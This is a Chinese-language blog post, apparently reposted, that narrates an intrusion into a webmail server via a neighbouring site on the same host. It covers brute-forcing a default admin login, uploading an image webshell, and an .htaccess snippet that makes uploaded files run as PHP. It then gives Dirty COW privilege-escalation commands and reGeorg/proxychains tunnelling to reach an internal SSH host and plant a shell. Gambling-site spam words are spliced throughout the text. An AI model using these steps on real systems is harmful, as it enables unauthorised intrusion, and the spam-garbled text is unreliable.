对某webmail的渗透测试

365bet手机版网址:2018-08-27 365bet体育在线平台: 3990 次
信息搜索
  首先365bet体育在线平台先针对目标进行思路整理。
  Webmail通常就是查看版本漏洞,旁站、c  段、敏感目录泄露等!其他的一些方法暂时想不到了......
  主域名:http://webmail.xxxx.xxx,Linux 、Apache 、nmap扫描一下端口。
  没有获取到horde的版本号继续往下进行,目录扫描的话用御剑,扫到一个test.php:
  现在365bet体育在线平台又获得新的信息Webmail版本号(horde 3.3.10)、绝对路径、ip、内核版(2.6.32-71.29.1.el6. x86_64)。
  通过版本信息搜索公开漏洞,然而并没有。
  没二级域名?查询二级域名的工具有很多,这里就不多先容。
  查了下同服域名存在25个瞬间感觉有戏。
  经过测试并没找到可以利用的漏洞,随便点进一个旁站,试了一下后台地址,发现登陆处没有验证码验证,可以爆破一波,输入admin,admin抓包开启burp爆破, 登陆成功......
拿SHELL
  找个资讯发布的地方上传图片  -->构建图片马命名为1.jpg -->burp抓包 -->改包1.php-->成功上传,发现不解析。
  365bet体育在线平台可以上传. htaccess 文件来解决这个问题,.htaccess 文件是Apache 服务器中的一个配置文件,它负责相关目录下的网页配置。
  通过htaccess文件,可以实现:
  网页301重定向、自定义404页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
  例如:
  <FilesMatch "ht">
  SetHandler application/x-httpd-php
  </FilesMatch>
  将其保存重命名为.htaccess再上传就ok,下面是我上传的大马:
LINUX提权
  现在365bet体育在线平台已经获取到主站旁站的一个权限,离主站已经不远了。查看一下365bet体育在线平台现在的权限、内核版本、发行版。
  Whoami              --获取当前用户名
  Uname -a            --查看内核版本
  cat /etc/*-release  --查看服务器版本
  ifconfig
  通过一些简单的收集  可得知处于CentOS、内核版本(2.6.32-71.29.1.el6.x86_64)内网(10.0.0.12) 、当前用户权限(apache)每次在提权的时候,365bet体育在线平台会一次次测试,我 们 将搜索所有可能的提权技术, 并依次 应用,直到成功。
  网上搜索前面所知的内核版本号 看看有没有可以利用的exp,很凑巧 可以直接用脏牛(Dirty COW)进行提权。
  脏牛的地址:(https://github.com/FireFart/dirtycow),说一下编译过程:
  $ gcc -pthread dirty.c -o dirty -lcrypt
  $记得编译前把dirty默认用户(firefart)改为root,不然连接不上。
  上传到shell里,然后实行:
  $Chmod +x dirty    --给予权限
  $./dirty 123       --实行增加密码
  用户已经弄好了脏牛提权还是很简单的。
  内网转发
  转发可以用到reGeorg 、msf 、ew、lcx......还有许多工具就不列举了。
  这里只说一下reGeorg ......
  先将reGeorg的对应脚本上传到服务器端,reGeorg提供了PHP、ASPX、JSP脚本。
  直接访问显示“Georg says, 'All seems fine'”, 表示脚本运行正常。
  github地址:
  https://github.com/sensepost/reGeorg
  下面就进行连接
  上传对应语言版本的tunnel文件到服务器上。
  然后本地访问上传的源文件,即可在本地与远程主机上形成一个http的回路。
  命令如下:
  python reGeorgSocksProxy.py -p 8080 -u http://xxxx/upload/tunnel.nosocket.php
  Ok成功!!!
  在kali里365bet体育在线平台使用proxychains代理
  下面再编辑配置一下proxychains:
  $vim /etc/proxychains.conf
  更改为:
  socks5     127.0.0.1 8080 //8080为你自己的端口,需要与reGeorg中设置的端口相同。
  进行ssh连接此内网机器的ssh端口为2278:
  成功登陆!
  通过find查找目标webmail的目录或者通过上面test.php文件获得的绝对路径进行翻找,上传shell:
  目标成功
  上线!!!

  转自:黑白之道
分享到:
×

微信扫一扫分享

XML 地图 | Sitemap 地图